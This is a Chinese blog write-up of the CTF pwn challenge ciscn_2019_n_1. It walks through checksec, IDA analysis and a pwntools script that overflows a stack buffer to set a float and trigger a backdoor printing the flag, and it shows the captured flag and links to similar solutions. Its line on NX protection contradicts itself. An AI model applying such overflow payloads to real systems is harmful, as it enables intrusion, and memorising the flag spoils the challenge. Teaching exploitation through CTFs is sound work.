CTF buuoj pwn-----第4题:ciscn_2019_n_1

最新推荐文章于 2025-04-07 21:22:46 发布
原创 最新推荐文章于 2025-04-07 21:22:46 发布 · 854 阅读 · 2 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#pwn #linux #安全
本文记录了一次CTF比赛中的pwn题目解决过程,涉及检查程序保护机制、静态分析、编写EXP及运行EXP来触发系统调用获取flag。通过checksec发现64位程序仅开启栈不可执行保护,分析IDA找到system调用,构造payload覆盖浮点数以执行后门函数,最终成功获取到flag。

CTF buuoj pwn-----第4题:ciscn_2019_n_1

前言

记录一下pwn的过程 同第1、2、3题一样,新手学习日记,流水线记录.
打开题目, 连接靶机,下载文件ciscn_2019_n_1
在这里插入图片描述

一. checksec ,检测文件的保护机制

bing@bing-virtual-machine:~/pwn$ checksec ciscn_2019_n_1
[*] '/home/bing/pwn/ciscn_2019_n_1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
bing@bing-virtual-machine:~/pwn$

从图上可以看出它是一个64位程序,仅开启了栈不可执行保护, 没有打开NX防护(堆栈可执行),No PIE. 猜测为 溢出漏洞.,

二. 静态分析,IDA打开文件

IDA打开文件ciscn_2019_n_1

  • 按下shift+f12,打开string window
    发现 /cat /flag

在这里插入图片描述

双击/cat /flag, 点击command, 点击X, 发现/cat /flag的address在可疑函数func()里
在这里插入图片描述

打开后门函数func(),记下函数地址0x400676

在这里插入图片描述
按下f5,发现func()函数里面含有system(“cat /flag”)语句,作用就是输出flag的文件信息.
在这里插入图片描述

  • 解题思路: 想办法触发后门函数func()函数的system(“cat /flag”)语句。
  • v1 大小44db ,v2 是一个float类型数4db。
  • 覆盖v2前需填入44个任意字符(v2和v1之间的距离为0x30 - 0x4),而后填入11.28125对应的十六进制数,覆盖v2的值。

易得。11.28125对应的十六进制为0x41348000

11.28125 转换为二进制为 1011.01001
11.28125 在计算机内部储存为 0100 0001 0011 0100 1000 0000 0000 0000
即11.28125 ==> 0x41348000

也可以再ida中查看得到:
在这里插入图片描述

三. 编写EXP

from pwn import *  

sh = remote('node4.buuoj.cn', 28775)
payload = b'a'*44+p64(0x41348000) 
sh.sendline(payload)

sh.interactive()

四. 运行EXP, 获取flag

bing@bing-virtual-machine:~/pwn$ python3 ./ciscn_2019_n_1.py 
[+] Opening connection to node4.buuoj.cn on port 28775: Done
[*] Switching to interactive mode
Let's guess the number.
flag{64196adb-3ef2-4dd0-a204-af00b9ef477c}
[*] Got EOF while reading in interactive
$ 
[*] Interrupted
[*] Closed connection to node4.buuoj.cn port 28775
bing@bing-virtual-machine:~/pwn$

flag{64196adb-3ef2-4dd0-a204-af00b9ef477c}

ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。解链接:https://blog.csdn.net/A951860555/article/details/111991072
ciscn_2019_n_1 ——两种解法
qq_41696518的博客
07-13 4304
ciscn_2019_n_1 两种解法
BUUCTF ciscn_2019_n_1
RookieMOR的博客
05-14 880
1.下载文件,用checksec一下: 2.用IDA64查看,进入func函数: 当v2=11.28125时获得flag,但只有v1的输入,没有v2输入。因为有一个gets函数,点击v1,v2可以知道,v1与v2差44个字节,可以通过输入v1的值去改变v2的值,实现栈溢出。 查看汇编可以看到有一个uconiss的比较指令,把xmm0与cs:dword_4007F4,由movss可以知道xmme0是v1或v2的值,那么点击dword_4007F4 看到一个 dd ,百度一下可以知道,.
【BUUCTF-PWN4-ciscn_2019_n_1
燕麦葡萄干的博客
07-04 819
这里为了堆栈平衡+1反而没办法打通,不+1反而可以成功,因此后面做的时候加不加1都试一下。需要v1变量溢出到v2,然后给v2 11.28125的值。查看变量在栈中的位置:v1 0x30 v2 0x0411.28125的十六进制值是0x41348000。checksec检查是64位,开启了NX保护。这里再试验第二种思路,溢出到变量2。后门函数的地址是0x4006BE。
CTFciscn_2019_n_1pwn1_sctf_2016--栈溢出
网络安全从业者的学习笔记
04-14 825
BUUICTFciscn_2019_n_1pwn1_sctf_2016--栈溢出类型解思路
2021_09_15_ciscn_2019_n_1
m0_51187558的博客
09-15 3020
ciscn_2019_n_1 前言 每日一pwn方向的第二。也是初入漏洞利用的一道特别基础的。 大家都应该尝试着做过了上一道,也就是test your nc。从解法来说其实那道的难度真的只是半脚踩在入门的门坎上。就像wp中所说的那样,目前pwn的核心是通过漏洞挖掘与利用来提权,而nc这道可以说是不需要任何漏洞的挖掘与利用,做出这道并不代表你已经入门pwn了。 虽然如此,从ciscn_2019_n_1这道开始,我们真正要开始尝试迈过pwn的那一道门槛,面对一些简单的漏洞进行利用了。 做流程
BUU CTF ciscn_2019_n_1
A_fish_like_sing的博客
03-20 2200
新手向对BUU CTF ciscn_2019_n_1的两种解法
BUUCTF pwnexp整合
菜的只能随便写写博客
02-29 797
0x01 rip from pwn import* p = remote('node3.buuoj.cn',27511) payload = 'a'*23+p64(0x401198)+p64(0x401186) p.sendline(payload) p.interactive()   0x02 warmup_csaw_2016 from pwn import * #p = proces...
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 864
初学pwn-writeUp BUUCTF的第四道ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
ciscn_2019_n_1
weixin_52034946的博客
01-15 628
检查,64位 ida查看 又是gets函数,思路来了,一直输入挤满栈,直到v2处输入11.28125 11.28125的16进制转换是 0x41348000h 脚本 from pwn import* r = remote(“node3.buuoj.cn”,29950) flag_addr = 0x41348000 payload = “a”*(0x30-0x4)+p64(flag_addr) r.sendline(payload) r.interactive() 0x30 - 0x4 就是v1到v2处的空
PWN学习记录(4)BUUCTF-ciscn_2019_n_1
m0_58824086的博客
08-05 483
下载目得到ciscn_2019_n_1,利用 file 命令查看该文件的类型,再通过checksec ./filename查看保护机制。将文件放入IDA中查看,打开字符串窗口。没有发现 /bin/sh,但找到了cat flag.txt。打开终端,输入vim 1.py 创建一个python文件(命名随意)NX enabled如果这个保护开启就是意味着栈中数据没有执行权限。将exp文件输入进1.py中,Esc+:wq保存并退出1.py。双击cat flag.text。打开main,F5反编译。
ciscn_2019_n_1 1(栈溢出,变量覆盖)
最新发布
Snk0xHeart的博客
04-07 931
开虚拟机,扔进去checksec64位,还是没有开栈保护扔进IDA(64位),找到main,F5反编译都点一下,感觉没啥东西然后我们点到func的时候我们看到了熟悉的gets函数还有system(“cat /flag”)这里,我们对这个程序进行栈溢出,在v1到v2间塞入字节数据,然后让v2=11.28125,我们就可以得到flag我们点进gets函数括号中的v1,v1对应的是var_30,v2对应var_4完整代码如下。
目:ciscn_2019_n_1来详细学习dbg和pwntools
WdIg-2023的博客
01-21 1755
我们在做Linux平台下的pwn目的时候,调试是必不可少的一步,在调试的过程中找到漏洞并用pwntools写出攻击脚本。
BUUCTFciscn_2019_n_1 1
qq_41560595的博客
09-24 4915
这道是栈溢出型,又不同于一般的栈溢出,在此做个总结。 查看权限 拖入IDA,F5可用函数 解思路:这道的意思是输入字符串v1,判断v2。考虑输入长字符串覆盖到存储v2的内存空间,把v2的值改掉。 因此,覆盖0x30-0x4=44个字节给v1,另外4个字节给v2 由于v2数值在内存中以16进制存储,所以,找到11.28125的16进制值。 存在两个比较指令,双击进去。 0x41348000就是16进制的11.28125。 编写脚本 from pwn import * p=remote('
[BUUCTF-pwn]——ciscn_2019_n_1
Y_peak的博客
01-31 1639
[BUUCTF-pwn]——ciscn_2019_n_1 [BUUCTF-pwn]——ciscn_2019_n_1思路一 —— 覆盖局部变量思路二 —— 覆盖返回地址 目地址:https://buuoj.cn/challenges#ciscn_2019_n_1 目: 老规矩下载下来后,在Linux上checksec一下,64位,并且没有开启栈保护,意味着我们可以利用栈溢出 在IDA中看一下,main函数里面没有什么可以利用的 双击func函数看看,就是我们想要的。 思路一 —— 覆盖局部变量
【BUUCTFciscn_2019_n_1
2201_75556700的博客
11-29 520
4、看到调用了func函数,双击查看,用到了gets函数,存在栈溢出,这里需要判断v2的值等于11.28125,才会执行脚本。3、使用64位的ida分析,找到main函数,F5反汇编。目二:【BUUCTFciscn_2019_n_1。v1数组大小:44字节(0x30-0x04)2、下载附件在kali中分析。
三种方式搞定buuctfciscn_2019_n_1
weixin_54452942的博客
03-26 989
三种方法解ciscn_2019_n_1,简单易懂,走过路过不要错过
【BUUCTF - PWNciscn_2019_n_1
古月浪子的博客
03-19 3701
checksec一下 IDA打开,发现如果满足的条件达成,就能get flag 找到栈溢出漏洞,输入可以覆盖到v2 写代码把11.28125在内存中的十六进制表示出来 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' ...
BUUCTF|PWN-ciscn_2019_n_1-WP
l2645470582_的博客
07-28 487
1、下载文件并开启靶机 2、在Linux系统中查看该文件信息 checksec ciscn_2019_n_1 3、文件查出来是64位文件,我们用64位IDA打开该文件 3.1、shift+f12查看关键字符串 3.2、双击关键字符串cat/flag,再按F5进入反编译代码区 3.3、cat/flag地址为 v1地址: r返回地址: 4、编译代码 #encoding=utf-8 from pwn imp...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值